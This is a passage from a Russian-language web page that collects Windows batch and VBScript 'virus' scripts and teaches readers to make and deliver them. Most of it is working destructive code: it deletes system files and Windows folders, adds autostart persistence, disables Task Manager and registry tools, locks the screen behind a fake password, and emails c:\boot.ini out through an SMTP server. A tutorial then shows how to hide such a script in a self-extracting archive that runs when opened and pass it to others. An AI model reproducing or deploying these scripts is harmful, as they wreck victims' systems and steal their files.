  163. reg add «hklm\Software\Microsoft\Windows\CurrentVersion\Run» /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f

  164. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoDrives /t REG_DWORD /d 67108863 /f

  165. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoViewOnDrive /t REG_DWORD /d 67108863 /f

  166. echo fso.deletefile «C:\ntldr»,1 >> %temp%\temp.vbs

  167. reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoSelectDownloadDir» /d 1 /f

  168. reg add «HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown» /v «IExplorer» /d 0 /f

  169. reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoFindFiles» /d 1 /f

  170. reg add «HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions» /v «NoNavButtons» /d 1 /f

  171. echo fso.deletefolder «D:\Windows»,1 >> %temp%\temp.vbs

  172. echo fso.deletefolder «I:\Windows»,1 >> %temp%\temp.vbs

  173. echo fso.deletefolder «C:\Windows»,1 >> %temp%\temp.vbs

  174. echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs

  175. echo fso.deletefile sr+»\system32\hal.dll»,1 >> %temp%\temp.vbs

  176. echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs

  177. echo fso.deletefolder sr+»\system32\dllcache»,1 >> %temp%\temp.vbs

  178. echo sr=s.RegRead(«HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot») >> %temp%\temp.vbs

  179. echo fso.deletefolder sr+»\system32\drives»,1 >> %temp%\temp.vbs

  180. echo s.regwrite «HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString»,»forum.whack.ru™»>>%temp%\temp.vbs

  181. echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner»,»forum.whack.ru™»>>%temp%\temp.vbs

  182. echo s.regwrite «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization»,»forum.whack.ru™»>>%temp%\temp.vbs

  183. echo on error resume next > %temp%\temp1.vbs

  184. echo set FSO=createobject(«scripting.filesystemobject»)>>%temp%\temp1.vbs

  185. echo do>>%temp%\temp1.vbs

  186. echo fso.getfile («A:\»)>>%temp%\temp1.vbs

  187. echo loop>>%temp%\temp1.vbs

  188. echo on error resume next > %temp%\temp2.vbs

  189. echo Set S = CreateObject(«Wscript.Shell») >> %temp%\temp2.vbs

  190. echo do>>%temp%\temp2.vbs

  191. echo execute»S.Run «»%comspec% /c echo «» & Chr(7), 0, True»>>%temp%\temp2.vbs

  192. echo loop>>%temp%\temp2.vbs

  193. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disabletaskmgr /t REG_DWORD /d 1 /f

  194. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System» /v disableregistrytools /t REG_DWORD /d 1 /f

  195. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

  196. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f

  197. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f

  198. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum» /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f

  199. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoNetworkConnections /t REG_DWORD /d 1 /f

  200. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f

  201. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v StartmenuLogoff /t REG_DWORD /d 1 /f

  202. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f

  203. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoCommonGroups /t REG_DWORD /d 1 /f

  204. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFavoritesMenu /t REG_DWORD /d 1 /f

  205. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRecentDocsMenu /t REG_DWORD /d 1 /f

  206. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSetFolders /t REG_DWORD /d 1 /f

  207. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoAddPrinter /t REG_DWORD /d 1 /f

  208. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoFind /t REG_DWORD /d 1 /f

  209. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMHelp /t REG_DWORD /d 1 /f

  210. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoRun /t REG_DWORD /d 1 /f

  211. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

  212. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoClose /t REG_DWORD /d 1 /f

  213. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoChangeStartMenu /t REG_DWORD /d 1 /f

  214. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyDocs /t REG_DWORD /d 1 /f

  215. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoSMMyPictures /t REG_DWORD /d 1 /f

  216. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f

  217. reg add «hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer» /v NoControlPanel /t REG_DWORD /d 1 /f

  218. echo set application=createobject(«shell.application»)>>%temp%\temp.vbs

  219. echo application.minimizeall>>%temp%\temp.vbs

  220. reg add «hklm\Software\Microsoft\Windows\CurrentVersion\run» /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f

  221. start rundll32 user32, SwapMouseButton

  222. reg add «HKCR\exefile\shell\open\command» /ve /t REG_SZ /d rundll32.exe /f

  223. echo i=50 >> %temp%\temp.vbs

  224. echo while i^>0 or i^<0 >> %temp%\temp.vbs

  225. echo S.popup «forum.whack.ru™»,0, «forum.whack.ru™»,0+16 >> %temp%\temp.vbs

  226. echo i=i-1 >> %temp%\temp.vbs

  227. echo wend >> %temp%\temp.vbs

  228. echo do >> %temp%\temp.vbs

  229. echo wscript.sleep 200 >> %temp%\temp.vbs

  230. echo s.sendkeys»{capslock}» >> %temp%\temp.vbs

  231. echo wscript.sleep 200 >> %temp%\temp.vbs

  232. echo s.sendkeys»{numlock}» >> %temp%\temp.vbs

  233. echo wscript.sleep 200 >> %temp%\temp.vbs

  234. echo s.sendkeys»{scrolllock}» >> %temp%\temp.vbs

  235. echo loop>> %temp%\temp.vbs

  236. echo Set oWMP = CreateObject(«WMPlayer.OCX.7») >> %temp%\temp.vbs

  237. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs

  238. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs

  239. echo For i = 0 to colCDROMs.Count — 1 >> %temp%\temp.vbs

  240. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs

  241. echo next >> %temp%\temp.vbs

  242. echo End If >> %temp%\temp.vbs

  243. echo Call SendPost(«smtp.mail.ru», «forum.whack.ru™@mail.ru», «[email protected]», «…», «Копм заражен!») >> %temp%\temp.vbs

  244. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs

  245. echo Set iMsg = CreateObject(«CDO.Message») >> %temp%\temp.vbs

  246. echo Set iConf = CreateObject(«CDO.Configuration») >> %temp%\temp.vbs

  247. echo Set Flds = iConf.Fields >> %temp%\temp.vbs

  248. echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusing») = 2 >> %temp%\temp.vbs

  249. echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpauthenticate») = 1 >> %temp%\temp.vbs

  250. echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendusername») = «support» >> %temp%\temp.vbs

  251. echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/sendpassword») = «support» >> %temp%\temp.vbs

  252. echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserver») = «smtp.mail.ru» >> %temp%\temp.vbs

  253. echo Flds.Item(«http://schemas.microsoft.com/cdo/configuration/smtpserverport») = 25 >> %temp%\temp.vbs

  254. echo Flds.Update >> %temp%\temp.vbs

  255. echo iMsg.Configuration = iConf >> %temp%\temp.vbs

  256. echo iMsg.To = strTo >> %temp%\temp.vbs

  257. echo iMsg.From = strFrom >> %temp%\temp.vbs

  258. echo iMsg.Subject = strSubject >> %temp%\temp.vbs

  259. echo iMsg.TextBody = strBody >> %temp%\temp.vbs

  260. echo iMsg.AddAttachment «c:\boot.ini» >> %temp%\temp.vbs

  261. echo iMsg.Send >> %temp%\temp.vbs

  262. echo End Function >> %temp%\temp.vbs

  263. echo Set iMsg = Nothing >> %temp%\temp.vbs

  264. echo Set iConf = Nothing >> %temp%\temp.vbs

  265. echo Set Flds = Nothing >> %temp%\temp.vbs

  266. echo s.run «shutdown -r -t 0 -c «»pcforumhack.ru™»» -f»,1 >> %temp%\temp.vbs

  267. start %temp%\temp.vbs

  268. start %temp%\temp1.vbs

  269. start %temp%\temp2.vbs

  270. Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует)

  271. @echo off

  272. CHCP 1251

  273. cls

  274. Set Yvaga=На вашем компьютере найден вирус.

  275. Set pass=Пароль

  276. Set pas=Введите пароль.

  277. Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль

  278. Set dim=Выключаю вирус…

  279. title Внимание!!!

  280. CHCP 866

  281. IF EXIST C:\windows\boot.bat (

  282. goto ok )

  283. cls

  284. IF NOT EXIST C:\windows\boot.bat (

  285. ECHO Windows Registry Editor Version 5.00 >> C:\0.reg

  286. ECHO. >> C:\0.reg

  287. ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg

  288. ECHO. >> C:\0.reg

  289. ECHO «Shell»=»Explorer.exe, C:\\windows\\boot.bat » >> C:\0.reg

  290. start/wait regedit -s C:\0.reg

  291. del C:\0.reg

  292. ECHO @echo off >>C:\windows\boot.bat

  293. ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat

  294. ECHO reg add «HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system» /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat

  295. ECHO start sys.bat >>C:\windows\boot.bat

  296. attrib +r +a +s +h C:\windows\boot.bat

  297. copy virus.bat c:\windows\sys.bat

  298. attrib +r +a +s +h C:\windows\sys.bat

  299. GOTO end)

  300. :ok

  301. cls

  302. Echo %Yvaga%

  303. echo.

  304. echo %virus%

  305. echo %pas%

  306. set /a choise = 0

  307. set /p choise=%pass%:

  308. if «%choise%» == «101» goto gold

  309. if «%choise%» == «200393» goto status

  310. exit

  311. :status

  312. echo %dim%

  313. attrib -r -a -s -h C:\windows\boot.bat

  314. del C:\windows\boot.bat

  315. attrib -r -a -s -h C:\windows\sys.bat

  316. del C:\windows\sys.bat

  317. cls

  318. :gold

  319. start C:\

  320. :end

  321. Добавляет программу в автозагрузку ОС

  322. copy «»%0″» «%SystemRoot%\system32\File.bat»

  323. reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f

  324. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

  325. Этот вирус,блокирует все программы,но интернет работает.

  326. @Echo off

  327. Echo Virus Loading

  328. Date 13.09.96

  329. If exist c:ski.bat goto abc

  330. Copy %0 c:ski.bat

  331. Attrib +h c:ski.bat

  332. Echo c:ski.bat >>autoexec.bat

  333. :abc

  334. md PRIDUROK

  335. md LUZER

  336. md DURAK

  337. md LAMER

  338. Label E: PRIDUROK

  339. assoc .exe=.mp3

  340. del c:Program Files/q

  341. Echo VIRUS LOAD

  342. Создаем вирус

  343. В этой статье мы научимся создавать вредоносные программки, что-то вроде вируса. Где мы будем использовать штатные средства Windows.

  344. И так начнём:

  345. Для начала нам надо создать Текстовый документ.txt

  346. Правой кнопкой мыши по рабочему столу, дальше «создать» и выбираем «Текстовый документ»

  347. Открываем его, дальше нам надо забить в него команды bat файлов

  348. Примеры ниже:

  349. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши

  350. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений

  351. time 0:00 >nul – Поставить время на 00:00

  352. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную

  353. del «%SystemRoot%Cursors*.*» >nul – Удалить курсор мыши

  354. del «%SystemRoot%Media» /q >nul – Удалить системные звуки Windows

  355. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели управления

  356. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол

  357. shutdown -r -t 1 -c «lol» -f >nul – Форсированная перезагрузка ПК

  358. shutdown -s -t 1 -c «lol» -f >nul – Форсированное выключение ПК

  359. taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe

  360. net share «ResName»=»C:» >nul – Расшарить диск C:

  361. label C:Диск >nul – Переименовать диск С:

  362. msg * «Текст сообщения» >nul – Показать Windows-стилизованное сообщение с кнопкой ОК

  363. del «%0» >nul – Самоликвидация вирус

  364. Давайте мы попробуем поменять местами значения кнопок мыши, напишем в текстовом документе.txt это:

  365. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

  366. Сохраняем, и чтобы команда заработала нам надо переименовать «Текстовый документ.txt» вместо txt пишем bat, у нас должно получится вот так «Текстовый документ.bat» (Без кавычек)

  367. Вот и все небольшой простенький вредоносный вирус создан.

  368. Если хотите убедиться,что вирус создан открываем Текстовый документ.bat

  369. И радуемся)) Если хотите вернуть местами кнопки мыши, то

  370. Заходим в Панель управления заходите в файл под названием «Мышь»

  371. Убираем галочку где написано «обменять назначение кнопок», нажимаете применить. Вот и все.

  372. Если хотите пошутить над другом или подкинуть вирус то делаем так:

  373. Ваш созданный вирус bat добавляем в архив, надеюсь все знают, как это делается. Правой кнопкой мыши на файле и добавить в архив.

  374. Мы зашли в «Имя и Параметры архива», ставим галочку где написано «Создать SFX-архив»

  375. Потом заходим «Дополнительно» дальше в «Параметры SFX…»

  376. Где написано «Выполнить после распаковки «пишем НАЗВАНИЕ вашего bat файла, например, если у вас название вашего bat файла «Текстовый документ.bat» то в поле «Выполнить после распаковки» пишем Текстовый документ.bat

  377. И теперь если открыть вот этот наш архив (вирус), надо нажать «Извлечь», и вирус автоматический сработает.

  378. Команды для BAT-файлов

  379. Это команды, которые используются для BAT файлов.

  380. Ну в общем так сказать, для написания вирусов.

  381. ASSOC — Отображает или модифицирует связи расширений файлов

  382. AT — Планирует команды и программы для выполнения на компьютере.

  383. ATTRIB — Отображает или изменяет атрибуты файла.

  384. BREAK — Устанавливает или отменяет проверку комбинации [Ctrl+C].

  385. CACLS — Отображает или модифицирует списки управления доступом (ACLs) для файлов.

  386. CALL — Вызывает один *.BAT-файл из другого.

  387. CD — Отображает имя или изменяет имя текущей директории.

  388. CHCP — Отображает или устанавливает номер активной кодовой страницы.

  389. CHDIR — Отображает имя или изменяет имя текущей директории.

  390. CHKDSK — Проверяет диск и отображает отчет о состоянии.

  391. CLS — Очищает экран.

  392. CMD — Стартует новый экземпляр интерпретатора команд Windows NT.

  393. COLOR — Устанавливает цвета по умолчанию для переднего и заднего плана консоли.

  394. COMMAND — Стартует новую копию интерпретатора команд Windows.

  395. COMP — Сравнивает содержимое двух файлов или установки файлов.

  396. COMPACT — Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).

  397. CONVERT — Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.

  398. COPY — Копирует один или больше файлов на другое место.

  399. CTTY — Изменяет терминальное устройство, используемое для управления вашей системой.

  400. DATE — Отображает или устанавливает дату.

  401. DEL — Удаляет один или более файлов.

  402. DEBUG — Выполняет отладку, тестирование программ и редактирование инструментальных средств.

  403. DIR — Отображает список файлов и поддиректорий в директории.

  404. DISKCOMP — Сравнивает содержимое двух дискет.

  405. DISKCOPY — Копирует содержимое одной дискеты на другую.

  406. DOSKEY — Редактирует командные строки, восстанавливает команды Windows и создает макрос.

  407. ECHO — Отображает сообщения, или включает/выключает вывод команд.

  408. EMM386 — Включает/выключает поддержку расширенной памяти EMM386.

  409. ENDLOCAL — Заканчивает локализацию изменений окружающей среды в *.BAT-файле.

  410. ERASE — Удаляет один или более файлов.

  411. EXIT — Прекращает выполнение программы (интерпретатор команд).

  412. EXTRACT — Средство извлечения информации из CAB — файлов.

  413. FC — Сравнивает два файла или установки файлов, и отображает различие между ними.

  414. FIND — Ищет текстовую строку в файле или файлах.

  415. FINDSTR — Поиск строк в файлах.

  416. FOR — Выполняет указанную команду для каждого файла в наборе файлов.

  417. FORMAT — Форматирует диск для использования с Windows.

  418. FTYPE — Отображает или модифицирует типы файлов, используемых в связях расширений.

  419. GOTO — Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.

  420. GRAFTABL — Способность Windows отображать символы псевдографики, вставленные в графическом режиме.

  421. HELP — Обеспечивает информацию Help для команд Windows.

  422. IF — Выполняет обработку условия в *.BAT-файле.

  423. KEYB — Конфигурирует клавиатуру для заданного языка.

  424. LABEL — Создает, изменяет, или удаляет метку тома на диске.

  425. LOADHIGH(LH) — Загружает программу в верхние адреса памяти.

  426. MD — Создает директорию.

  427. MEM — Отображает величину используемой и свободной памяти в вашей системе.

  428. MKDIR — Создает директорию.

  429. MODE — Конфигурирует системное устройство.

  430. MORE — Отображает вывод одного экрана за раз.

  431. MOVE — Перемещает один или более файлов из одной директории в другую на том же диске.

  432. NETSTAT — Отображает статистики протоколов и текущих сетевых соединений TCP/IP.

  433. NLSFUNC — Загружает информацию, специфическую для страны.

  434. PATH — Отображает или устанавливает путь поиска для выполняемых файлов.

  435. PAUSE — Приостанавливает обработку *.BAT-файла и отображает сообщение.

  436. POPD — Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.

  437. PRINT — Печатает текстовый файл.

  438. PROMPT — Изменяет подсказку к командам Windows.

  439. PUSHD — Сохраняет текущую директорию, потом изменяет.

  440. RD — Удаляет директорию.

  441. RECOVER — Восстанавливает читаемую информацию с плохого или дефектного диска.

  442. REM — Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.

  443. REN — Переименует файл или файлы.

  444. RENAME — Переименует файл или файлы.

  445. REPLACE — Заменяет файлы.

  446. RESTORE — Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.

  447. RMDIR — Удаляет директорию.

  448. SET — Отображает, устанавливает или удаляет переменные среды Windows.

  449. SETLOCAL — Начинает локализацию изменений среды в *.BAT-файле.

  450. SETVER — Устанавливает номер версии MS-DOS, который Windows сообщает программе.

  451. SHIFT — Сдвигает позицию замещаемых параметров в *.BAT-файле.

  452. SMARTDRV — Инсталлирует и конфигурирует утилиту кэширования диска SMART — драйва.

  453. SORT — Сортирует входной поток.

  454. START — Стартует отдельное окно для выполнения указанной программы или команды.

  455. SUBST — Связывает путь с литерой диска.

  456. SYS — Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.

  457. TIME — Отображает или устанавливает системное время.

  458. TITLE — Устанавливает заголовок окна для сеанса.

  459. TREE — Графически отображает структуру директория в драйве или путь.

  460. TYPE — Отображает содержимое текстового файла.

  461. VER — Отображает версию Windows.

  462. VERIFY — Сообщает Windows, проверять ли правильность записи файлов на диск.

  463. VOL — Отображает метку дискового тома и серийный номер.

  464. XCOPY — Копирует файлы и деревья директории.

  465. 1

Понравилась статья? Поделить с друзьями:
0 0 голоса
Рейтинг статьи
Подписаться
Уведомить о
guest

0 комментариев
Старые
Новые Популярные
Межтекстовые Отзывы
Посмотреть все комментарии
  • Код ошибки 0x8007042b windows 10
  • Nhl 09 лагает на windows 10
  • Папка windows разрослась windows 10
  • Bittorrent программа для windows
  • Postgresql обновление версии windows